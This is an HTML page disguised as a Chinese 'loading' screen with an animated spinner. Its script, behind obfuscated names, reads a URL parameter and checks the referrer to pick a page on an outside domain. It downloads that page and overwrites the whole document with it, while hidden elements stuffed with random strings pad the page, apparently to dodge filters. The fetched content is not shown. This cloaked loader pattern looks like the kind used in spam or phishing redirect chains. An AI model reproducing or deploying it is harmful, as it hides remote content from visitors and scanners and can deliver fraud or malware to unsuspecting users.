<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .RybjBeJZEh {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .RybjBeJZEh .sQutFZo {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .RybjBeJZEh .content {
            line-height: 50px;
            text-align: center
        }

        .RybjBeJZEh .img {
            width: 100%
        }

        .RybjBeJZEh .jtHilIyqeKm {
            text-align: center
        }

        .RybjBeJZEh .jtHilIyqeKm span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .RybjBeJZEh .jtHilIyqeKm span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .RybjBeJZEh .jtHilIyqeKm span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .RybjBeJZEh .jtHilIyqeKm span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .RybjBeJZEh .jtHilIyqeKm span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .RybjBeJZEh .jtHilIyqeKm span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .RybjBeJZEh .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function MHaEhBrdLbTIr(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var vqikLf = MHaEhBrdLbTIr('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ vqikLf +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ vqikLf +".html?a=share";
		}
		
        tvsDVXI=url+"#"+new Date().getTime();
        tvsDVXI && function() {
            $.get(tvsDVXI, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >NVqJOWp9oedBOK6sDNwepCDpC4BArJDQKB4Z8XrrqwqtQoGrTUAzChpNoAAzNy40nP9GQDIuiBqItW35HKkcM0FpM</h1>
<span style='display:none'>cRdlAy1PZsi5OSw1HEYx</span>
<img  src='' style='display:none'>
<span style='display:none'>cRdlAy1PZsi5OSw1HEYx</span>
<ul style='display:none' >R8cDviazcFlKcnPQzdKdVghLXlpwbBFkdGwDY5orExn3C1fd3c4ah3rQoet8isswvGrc3W8vASliT</ul>
<li style='display:none' >Evb9MWqtNAOLZM3QMvQj9DqakDCUdmPl6ncgB40oZmJ6H7DKfzZz46klpSTRPxlNyikVfMBDV8vc6c38HpkPLsxMpN</li><div class="RybjBeJZEh">
    <div class="sQutFZo">
        <div class="jtHilIyqeKm">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<li style='display:none' >SIQoxmgQwqj</li>
<ul style='display:none' >b7Ug8K0NUVhcOLjTrxn3DE6RDZWj2jA7TkcoK5RoqAw1e3adbzbOPg8pAJiiimmZv2J5</ul>
<li style='display:none' >SIQoxmgQwqj</li>
<span style='display:none'>jBTb7KFlcqld9YkKPSogWknwbLG</span></body>
</html>